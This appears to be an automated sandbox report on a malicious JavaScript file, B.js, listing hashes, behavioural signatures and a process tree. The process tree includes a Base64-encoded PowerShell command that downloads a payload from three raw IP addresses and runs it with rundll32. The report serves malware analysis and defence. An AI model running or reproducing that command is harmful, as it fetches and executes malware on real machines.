Analysis
max time kernel: 30s
max time network: 33s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 04/05/2023, 10:34
Static task: static1

Behavioral task: behavioral1
  Sample: B.js
  Resource: win7-20230220-en
  4 signatures, 150 seconds

Behavioral task: behavioral2
  Sample: B.js
  Resource: win10v2004-20230220-en
  6 signatures, 150 seconds
General
Target: B.js
Size: 57KB
MD5: 52d96ebabe2bc08cb504f4b7b29b5f65
SHA1: a609c8c0fbd4867421d65fa79834c3527cbb7690
SHA256: ef023b0a3aa55f424298cb1f64a496392c61c02b8167b04feedc7cc31d123f2b
SHA512: 046cbcc8c80e2688432eaf1cf957388818f828642b6328fea5553adac4a25813ec875678c5c501577dc7c7288c9adbffd71195995aab18d51a76e9cff7b30c30
SSDEEP: 768:VyMNhRhlTosj7PJMenmwELqOttPki0P9B9VosNMaEiGHGr6kQ7Ig1KzHyyLdSmKl:fUsZnwGGkQ7A0xherXT4EANnOvwr
Score: 3/10
Malware Config

Signatures

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  1628  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1628  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                          pid   Process      procid_target
  PID 1964 wrote to memory of 896      1964  wscript.exe  28
  PID 1964 wrote to memory of 896      1964  wscript.exe  28
  PID 1964 wrote to memory of 896      1964  wscript.exe  28
  PID 896 wrote to memory of 1628      896   wscript.exe  29
  PID 896 wrote to memory of 1628      896   wscript.exe  29
  PID 896 wrote to memory of 1628      896   wscript.exe  29
Processes

1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\B.js
   - Suspicious use of WriteProcessMemory
   PID: 1964

   2. C:\Windows\System32\wscript.exe
      Command line: "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\B.js" UnpiquedUnpreventative WiregrassUncrisp inthralls indiscussible
      - Suspicious use of WriteProcessMemory
      PID: 896

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB1AG4AZABlAHIAcABpAHQAYwBoAEUAeABoAGkAYgBpAHQAaQBvAG4AaQB6AGUAIAA9ACAAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADMANAAuADEAMQA5AC4ANwA5AC8AVQBYAFkALwBxAHQAUgBHAGgAaQBVAHAANgBlADYALABoAHQAdABwADoALwAvADEAMAA0AC4AMgAzADQALgAxADEAOAAuADEANQAzAC8AZQBoAHQAdABSADMALwBBAFcAawA0AHYASAAsAGgAdAB0AHAAOgAvAC8AMQA3ADIALgA4ADYALgAxADIAMwAuADEAMAAzAC8ANQBNAEcAeQBWAC8ANwB1ADcAZQBrADYARgA2ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAGMAaABvAGsAZQBiAGUAcgByAHkAUQB1AGUAYQBjAGgAaQBlAHIAIABpAG4AIAAkAHUAbgBkAGUAcgBwAGkAdABjAGgARQB4AGgAaQBiAGkAdABpAG8AbgBpAHoAZQApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAYwBoAG8AawBlAGIAZQByAHIAeQBRAHUAZQBhAGMAaABpAGUAcgAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANgAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAQgBpAHMAYQBnAHIAZQAuAGQAaQBzAHAAbABhAGMAZQByAFAAaAB5AGwAbABvAHAAbwBkAG8AdQBzADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAQgBpAHMAYQBnAHIAZQAuAGQAaQBzAHAAbABhAGMAZQByAFAAaAB5AGwAbABvAHAAbwBkAG8AdQBzACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANQAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBDAEEARwBrAEEAYwB3AEIAaABBAEcAYwBBAGMAZwBCAGwAQQBDADQAQQBaAEEAQgBwAEEASABNAEEAYwBBAEIAcwBBAEcARQBBAFkAdwBCAGwAQQBIAEkAQQBVAEEAQgBvAEEASABrAEEAYgBBAEIAcwBBAEcAOABBAGMAQQBCAHYAQQBHAFEAQQBiAHcAQgAxAEEASABNAEEATABBAEIAVQBBAEcAawBBAGIAUQBCAGwAQQBEAHMAQQAiADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         PID: 1628